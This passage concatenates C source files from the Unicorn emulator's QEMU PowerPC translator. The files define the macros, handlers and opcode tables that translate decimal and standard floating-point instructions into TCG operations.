/*** Decimal Floating Point ***/ static inline TCGv_ptr gen_fprp_ptr(TCGContext *tcg_ctx, int reg) { TCGv_ptr r = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, r, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[reg].u64[0])); return r; } #define GEN_DFP_T_A_B_Rc(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rd, ra, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rd = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_A_B(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, 
ctx->base.pc_next - 4); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, ra, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_I_B(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 uim; \ TCGv_ptr rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ uim = tcg_const_i32(tcg_ctx, UIMM5(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, uim, rb); \ tcg_temp_free_i32(tcg_ctx, uim); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define GEN_DFP_BF_A_DCM(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra; \ TCGv_i32 dcm; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ dcm = tcg_const_i32(tcg_ctx, DCM(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ tcg_ctx->cpu_env, ra, dcm); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_i32(tcg_ctx, dcm); \ } #define GEN_DFP_T_B_U32_U32_Rc(name, u32f1, u32f2) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rb; \ TCGv_i32 u32_1, u32_2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ u32_1 = tcg_const_i32(tcg_ctx, u32f1(ctx->opcode)); \ u32_2 = tcg_const_i32(tcg_ctx, u32f2(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rb, u32_1, u32_2); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_i32(tcg_ctx, u32_1); \ tcg_temp_free_i32(tcg_ctx, u32_2); \ } #define GEN_DFP_T_A_B_I32_Rc(name, i32fld) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, ra, rb; \ TCGv_i32 i32; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ ra = gen_fprp_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ i32 = tcg_const_i32(tcg_ctx, i32fld(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, ra, rb, i32); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_i32(tcg_ctx, i32); \ } #define GEN_DFP_T_B_Rc(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rb; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rb = gen_fprp_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rb); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } #define 
GEN_DFP_T_FPR_I32_Rc(name, fprfld, i32fld) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rt, rs; \ TCGv_i32 i32; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_update_nip(ctx, ctx->base.pc_next - 4); \ rt = gen_fprp_ptr(tcg_ctx, rD(ctx->opcode)); \ rs = gen_fprp_ptr(tcg_ctx, fprfld(ctx->opcode)); \ i32 = tcg_const_i32(tcg_ctx, i32fld(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rt, rs, i32); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_ptr(tcg_ctx, rt); \ tcg_temp_free_ptr(tcg_ctx, rs); \ tcg_temp_free_i32(tcg_ctx, i32); \ } GEN_DFP_T_A_B_Rc(dadd) GEN_DFP_T_A_B_Rc(daddq) GEN_DFP_T_A_B_Rc(dsub) GEN_DFP_T_A_B_Rc(dsubq) GEN_DFP_T_A_B_Rc(dmul) GEN_DFP_T_A_B_Rc(dmulq) GEN_DFP_T_A_B_Rc(ddiv) GEN_DFP_T_A_B_Rc(ddivq) GEN_DFP_BF_A_B(dcmpu) GEN_DFP_BF_A_B(dcmpuq) GEN_DFP_BF_A_B(dcmpo) GEN_DFP_BF_A_B(dcmpoq) GEN_DFP_BF_A_DCM(dtstdc) GEN_DFP_BF_A_DCM(dtstdcq) GEN_DFP_BF_A_DCM(dtstdg) GEN_DFP_BF_A_DCM(dtstdgq) GEN_DFP_BF_A_B(dtstex) GEN_DFP_BF_A_B(dtstexq) GEN_DFP_BF_A_B(dtstsf) GEN_DFP_BF_A_B(dtstsfq) GEN_DFP_BF_I_B(dtstsfi) GEN_DFP_BF_I_B(dtstsfiq) GEN_DFP_T_B_U32_U32_Rc(dquai, SIMM5, RMC) GEN_DFP_T_B_U32_U32_Rc(dquaiq, SIMM5, RMC) GEN_DFP_T_A_B_I32_Rc(dqua, RMC) GEN_DFP_T_A_B_I32_Rc(dquaq, RMC) GEN_DFP_T_A_B_I32_Rc(drrnd, RMC) GEN_DFP_T_A_B_I32_Rc(drrndq, RMC) GEN_DFP_T_B_U32_U32_Rc(drintx, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintxq, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintn, FPW, RMC) GEN_DFP_T_B_U32_U32_Rc(drintnq, FPW, RMC) GEN_DFP_T_B_Rc(dctdp) GEN_DFP_T_B_Rc(dctqpq) GEN_DFP_T_B_Rc(drsp) GEN_DFP_T_B_Rc(drdpq) GEN_DFP_T_B_Rc(dcffix) GEN_DFP_T_B_Rc(dcffixq) GEN_DFP_T_B_Rc(dctfix) GEN_DFP_T_B_Rc(dctfixq) GEN_DFP_T_FPR_I32_Rc(ddedpd, rB, SP) GEN_DFP_T_FPR_I32_Rc(ddedpdq, rB, SP) GEN_DFP_T_FPR_I32_Rc(denbcd, rB, SP) GEN_DFP_T_FPR_I32_Rc(denbcdq, rB, SP) GEN_DFP_T_B_Rc(dxex) GEN_DFP_T_B_Rc(dxexq) GEN_DFP_T_A_B_Rc(diex) GEN_DFP_T_A_B_Rc(diexq) GEN_DFP_T_FPR_I32_Rc(dscli, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscliq, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscri, rA, DCM) GEN_DFP_T_FPR_I32_Rc(dscriq, rA, DCM) #undef GEN_DFP_T_A_B_Rc #undef GEN_DFP_BF_A_B #undef GEN_DFP_BF_A_DCM #undef GEN_DFP_T_B_U32_U32_Rc #undef GEN_DFP_T_A_B_I32_Rc #undef GEN_DFP_T_B_Rc #undef GEN_DFP_T_FPR_I32_Rc
unicorn-2.1.1/qemu/target/ppc/translate/dfp-ops.inc.c
#define _GEN_DFP_LONG(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_LONG_300(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, op2, mask, PPC_NONE, PPC2_ISA300) #define _GEN_DFP_LONGx2(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_LONGx4(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3B, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ 
GEN_HANDLER_E(name, 0x3B, op1, 0x08 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3B, op1, 0x18 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUAD(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUAD_300(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, op2, mask, PPC_NONE, PPC2_ISA300) #define _GEN_DFP_QUADx2(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP) #define _GEN_DFP_QUADx4(name, op1, op2, mask) \ GEN_HANDLER_E(name, 0x3F, op1, 0x00 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x08 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x10 | op2, mask, PPC_NONE, PPC2_DFP), \ GEN_HANDLER_E(name, 0x3F, op1, 0x18 | op2, mask, PPC_NONE, PPC2_DFP) #define GEN_DFP_T_A_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00210800) #define GEN_DFP_Tp_A_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00200800) #define GEN_DFP_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x001F0000) #define GEN_DFP_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x003F0800) #define GEN_DFP_Tp_B_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x003F0000) #define GEN_DFP_T_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x001F0800) #define GEN_DFP_BF_A_B(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00000001) #define GEN_DFP_BF_A_B_300(name, op1, op2) \ _GEN_DFP_LONG_300(name, op1, op2, 0x00400001) #define GEN_DFP_BF_Ap_Bp(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00610801) #define GEN_DFP_BF_A_Bp(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00600801) #define GEN_DFP_BF_A_Bp_300(name, op1, op2) \ _GEN_DFP_QUAD_300(name, op1, op2, 0x00400001) #define GEN_DFP_BF_A_DCM(name, op1, op2) \ _GEN_DFP_LONGx2(name, op1, op2, 0x00600001) #define GEN_DFP_BF_Ap_DCM(name, op1, op2) \ _GEN_DFP_QUADx2(name, op1, op2, 0x00610001) #define GEN_DFP_T_A_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x02010800) #define GEN_DFP_Tp_A_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x02000800) #define GEN_DFP_TE_T_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x00000000) #define GEN_DFP_TE_Tp_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x00200800) #define GEN_DFP_R_T_B_RMC_Rc(name, op1, op2) \ _GEN_DFP_LONGx4(name, op1, op2, 0x001E0000) #define GEN_DFP_R_Tp_Bp_RMC_Rc(name, op1, op2) \ _GEN_DFP_QUADx4(name, op1, op2, 0x003E0800) #define GEN_DFP_SP_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x00070000) #define GEN_DFP_SP_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x00270800) #define GEN_DFP_S_T_B_Rc(name, op1, op2) \ _GEN_DFP_LONG(name, op1, op2, 0x000F0000) #define GEN_DFP_S_Tp_Bp_Rc(name, op1, op2) \ _GEN_DFP_QUAD(name, op1, op2, 0x002F0800) #define GEN_DFP_T_A_SH_Rc(name, op1, op2) \ _GEN_DFP_LONGx2(name, op1, op2, 0x00000000) #define GEN_DFP_Tp_Ap_SH_Rc(name, op1, op2) \ _GEN_DFP_QUADx2(name, op1, op2, 0x00210000) GEN_DFP_T_A_B_Rc(dadd, 0x02, 0x00), GEN_DFP_Tp_Ap_Bp_Rc(daddq, 0x02, 0x00), GEN_DFP_T_A_B_Rc(dsub, 0x02, 0x10), GEN_DFP_Tp_Ap_Bp_Rc(dsubq, 0x02, 0x10), GEN_DFP_T_A_B_Rc(dmul, 0x02, 0x01), GEN_DFP_Tp_Ap_Bp_Rc(dmulq, 
0x02, 0x01), GEN_DFP_T_A_B_Rc(ddiv, 0x02, 0x11), GEN_DFP_Tp_Ap_Bp_Rc(ddivq, 0x02, 0x11), GEN_DFP_BF_A_B(dcmpu, 0x02, 0x14), GEN_DFP_BF_Ap_Bp(dcmpuq, 0x02, 0x14), GEN_DFP_BF_A_B(dcmpo, 0x02, 0x04), GEN_DFP_BF_Ap_Bp(dcmpoq, 0x02, 0x04), GEN_DFP_BF_A_DCM(dtstdc, 0x02, 0x06), GEN_DFP_BF_Ap_DCM(dtstdcq, 0x02, 0x06), GEN_DFP_BF_A_DCM(dtstdg, 0x02, 0x07), GEN_DFP_BF_Ap_DCM(dtstdgq, 0x02, 0x07), GEN_DFP_BF_A_B(dtstex, 0x02, 0x05), GEN_DFP_BF_Ap_Bp(dtstexq, 0x02, 0x05), GEN_DFP_BF_A_B(dtstsf, 0x02, 0x15), GEN_DFP_BF_A_Bp(dtstsfq, 0x02, 0x15), GEN_DFP_BF_A_B_300(dtstsfi, 0x03, 0x15), GEN_DFP_BF_A_Bp_300(dtstsfiq, 0x03, 0x15), GEN_DFP_TE_T_B_RMC_Rc(dquai, 0x03, 0x02), GEN_DFP_TE_Tp_Bp_RMC_Rc(dquaiq, 0x03, 0x02), GEN_DFP_T_A_B_RMC_Rc(dqua, 0x03, 0x00), GEN_DFP_Tp_Ap_Bp_RMC_Rc(dquaq, 0x03, 0x00), GEN_DFP_T_A_B_RMC_Rc(drrnd, 0x03, 0x01), GEN_DFP_Tp_A_Bp_RMC_Rc(drrndq, 0x03, 0x01), GEN_DFP_R_T_B_RMC_Rc(drintx, 0x03, 0x03), GEN_DFP_R_Tp_Bp_RMC_Rc(drintxq, 0x03, 0x03), GEN_DFP_R_T_B_RMC_Rc(drintn, 0x03, 0x07), GEN_DFP_R_Tp_Bp_RMC_Rc(drintnq, 0x03, 0x07), GEN_DFP_T_B_Rc(dctdp, 0x02, 0x08), GEN_DFP_Tp_B_Rc(dctqpq, 0x02, 0x08), GEN_DFP_T_B_Rc(drsp, 0x02, 0x18), GEN_DFP_Tp_Bp_Rc(drdpq, 0x02, 0x18), GEN_DFP_T_B_Rc(dcffix, 0x02, 0x19), GEN_DFP_Tp_B_Rc(dcffixq, 0x02, 0x19), GEN_DFP_T_B_Rc(dctfix, 0x02, 0x09), GEN_DFP_T_Bp_Rc(dctfixq, 0x02, 0x09), GEN_DFP_SP_T_B_Rc(ddedpd, 0x02, 0x0a), GEN_DFP_SP_Tp_Bp_Rc(ddedpdq, 0x02, 0x0a), GEN_DFP_S_T_B_Rc(denbcd, 0x02, 0x1a), GEN_DFP_S_Tp_Bp_Rc(denbcdq, 0x02, 0x1a), GEN_DFP_T_B_Rc(dxex, 0x02, 0x0b), GEN_DFP_T_Bp_Rc(dxexq, 0x02, 0x0b), GEN_DFP_T_A_B_Rc(diex, 0x02, 0x1b), GEN_DFP_Tp_A_Bp_Rc(diexq, 0x02, 0x1b), GEN_DFP_T_A_SH_Rc(dscli, 0x02, 0x02), GEN_DFP_Tp_Ap_SH_Rc(dscliq, 0x02, 0x02), GEN_DFP_T_A_SH_Rc(dscri, 0x02, 0x03), GEN_DFP_Tp_Ap_SH_Rc(dscriq, 0x02, 0x03),
unicorn-2.1.1/qemu/target/ppc/translate/fp-impl.inc.c
/* * translate-fp.c * * Standard FPU translation */ static inline void gen_reset_fpstatus(TCGContext *tcg_ctx) { gen_helper_reset_fpstatus(tcg_ctx, tcg_ctx->cpu_env); } static inline void gen_compute_fprf_float64(TCGContext *tcg_ctx, TCGv_i64 arg) { gen_helper_compute_fprf_float64(tcg_ctx, tcg_ctx->cpu_env, arg); gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } #if defined(TARGET_PPC64) static void gen_set_cr1_from_fpscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, tmp, cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], tmp, 28); tcg_temp_free_i32(tcg_ctx, tmp); } #else static void gen_set_cr1_from_fpscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_shri_tl(tcg_ctx, cpu_crf[1], cpu_fpscr, 28); } #endif /*** Floating-Point arithmetic ***/ #define _GEN_FLOAT_ACB(name, op, op1, op2, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ TCGv_i64 
t3; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ t3 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rC(ctx->opcode)); \ get_fpr(tcg_ctx, t2, rB(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t3, tcg_ctx->cpu_env, t0, t1, t2); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t3, tcg_ctx->cpu_env, t3); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t3); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t3); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ tcg_temp_free_i64(tcg_ctx, t3); \ } #define GEN_FLOAT_ACB(name, op2, set_fprf, type) \ _GEN_FLOAT_ACB(name, name, 0x3F, op2, 0, set_fprf, type); \ _GEN_FLOAT_ACB(name##s, name, 0x3B, op2, 1, set_fprf, type); #define _GEN_FLOAT_AB(name, op, op1, op2, inval, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t2, tcg_ctx->cpu_env, t0, t1); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t2, tcg_ctx->cpu_env, t2); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t2); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t2); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ } #define GEN_FLOAT_AB(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AB(name, name, 0x3F, op2, inval, 0, set_fprf, type); \ _GEN_FLOAT_AB(name##s, name, 0x3B, op2, inval, 1, set_fprf, type); #define _GEN_FLOAT_AC(name, op, op1, op2, inval, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rC(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t2, tcg_ctx->cpu_env, t0, t1); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t2, tcg_ctx->cpu_env, t2); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t2); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t2); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ } #define GEN_FLOAT_AC(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AC(name, name, 0x3F, op2, inval, 0, set_fprf, type); \ _GEN_FLOAT_AC(name##s, name, 0x3B, op2, inval, 1, set_fprf, type); #define GEN_FLOAT_B(name, op2, op3, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = 
tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_f##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_fpr(tcg_ctx, rD(ctx->opcode), t1); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t1); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } #define GEN_FLOAT_BS(name, op1, op2, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_f##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_fpr(tcg_ctx, rD(ctx->opcode), t1); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t1); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } /* fadd - fadds */ GEN_FLOAT_AB(add, 0x15, 0x000007C0, 1, PPC_FLOAT); /* fdiv - fdivs */ GEN_FLOAT_AB(div, 0x12, 0x000007C0, 1, PPC_FLOAT); /* fmul - fmuls */ GEN_FLOAT_AC(mul, 0x19, 0x0000F800, 1, PPC_FLOAT); /* fre */ GEN_FLOAT_BS(re, 0x3F, 0x18, 1, PPC_FLOAT_EXT); /* fres */ GEN_FLOAT_BS(res, 0x3B, 0x18, 1, PPC_FLOAT_FRES); /* frsqrte */ GEN_FLOAT_BS(rsqrte, 0x3F, 0x1A, 1, PPC_FLOAT_FRSQRTE); /* frsqrtes */ static void gen_frsqrtes(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_frsqrte(tcg_ctx, t1, tcg_ctx->cpu_env, t0); gen_helper_frsp(tcg_ctx, t1, tcg_ctx->cpu_env, t1); set_fpr(tcg_ctx, rD(ctx->opcode), t1); gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fsel */ _GEN_FLOAT_ACB(sel, sel, 0x3F, 0x17, 0, 0, PPC_FLOAT_FSEL); /* fsub - fsubs */ GEN_FLOAT_AB(sub, 0x14, 0x000007C0, 1, PPC_FLOAT); /* Optional: */ /* fsqrt */ static void gen_fsqrt(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_fsqrt(tcg_ctx, t1, tcg_ctx->cpu_env, t0); set_fpr(tcg_ctx, rD(ctx->opcode), t1); 